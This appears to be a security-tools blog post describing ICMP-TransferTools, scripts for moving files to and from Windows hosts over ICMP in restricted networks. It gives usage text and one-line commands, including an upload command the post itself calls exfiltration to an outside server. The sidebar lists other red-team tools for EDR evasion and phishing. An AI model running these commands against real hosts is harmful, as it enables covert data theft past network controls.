Kali Linux

ICMP-TransferTools : Transfer Files To And From A Windows Host Via ICMP In Restricted Network Environments

ICMP-TransferTools is a set of scripts designed to move files to and from Windows hosts in restricted network environments. This is accomplished using a total of 4 different files, consisting of a python server and powershell client for each transfer direction (Download & Upload).

The only dependency required is Impacket for one of the python scripts. It can be installed via pip like so:

pip3 install impacket

Download via ICMP

The included ICMP-SendFile.py and Invoke-IcmpDownload.ps1 scripts can be used to download a file to a Windows host via ICMP.

The python server must be run first to stage the file for download. See below for the script’s usage:

usage: ICMP-SendFile.py [-h] [-v] [-b 1000] source destination file
ICYGUIDER’S ICMP FILE DOWNLOAD SERVER
positional arguments:
source Public IP address of current host
destination Public IP address of destination host
file File to transfer over ICMP
optional arguments:
-h, –help show this help message and exit
-v, –verbose Verbosely print progress
-b 1000, –block-size 1000
Size of each block (Default: 1000)

Once imported, the powershell client can then be used to download the staged file like so:

Invoke-IcmpDownload PublicIPAddressOfServer FileToDownload

Upload via ICMP

The included ICMP-ReceiveFile.py and Invoke-IcmpUpload.ps1 scripts can be used to upload/exfiltrate a file from a Windows host via ICMP.

The python server must be run first to ensure it’s ready to accept requests from the client. See below for the script’s usage:

usage: ICMP-ReceiveFile.py [-h] src file
ICYGUIDER’S ICMP FILE UPLOAD SERVER
positional arguments:
src Public IP Address of client
file File to write data to
optional arguments:
-h, –help show this help message and exit

Once imported, the powershell client can then be used to upload the desired file like so:

Invoke-IcmpUpload PublicIPAddressOfServer FileToUpload

R K

Recent Posts

ModTask – Task Scheduler Attack Tool

ModTask is an advanced C# tool designed for red teaming operations, focusing on manipulating scheduled…

1 day ago

HellBunny : Advanced Shellcode Loader For EDR Evasio

HellBunny is a malleable shellcode loader written in C and Assembly utilizing direct and indirect…

1 day ago

SharpRedirect : A Lightweight And Efficient .NET-Based TCP Redirector

SharpRedirect is a simple .NET Framework-based redirector from a specified local port to a destination…

1 day ago

Flyphish : Mastering Cloud-Based Phishing Simulations For Security Assessments

Flyphish is an Ansible playbook allowing cyber security consultants to deploy a phishing server in…

2 days ago

DeLink : Decrypting D-Link Firmware Across Devices With A Rust-Based Library

A crypto library to decrypt various encrypted D-Link firmware images. Confirmed to work on the…

3 days ago

LLM Lies : Hallucinations Are Not Bugs, But Features As Adversarial Examples

LLMs (e.g., GPT-3.5, LLaMA, and PaLM) suffer from hallucination—fabricating non-existent facts to cheat users without…

3 days ago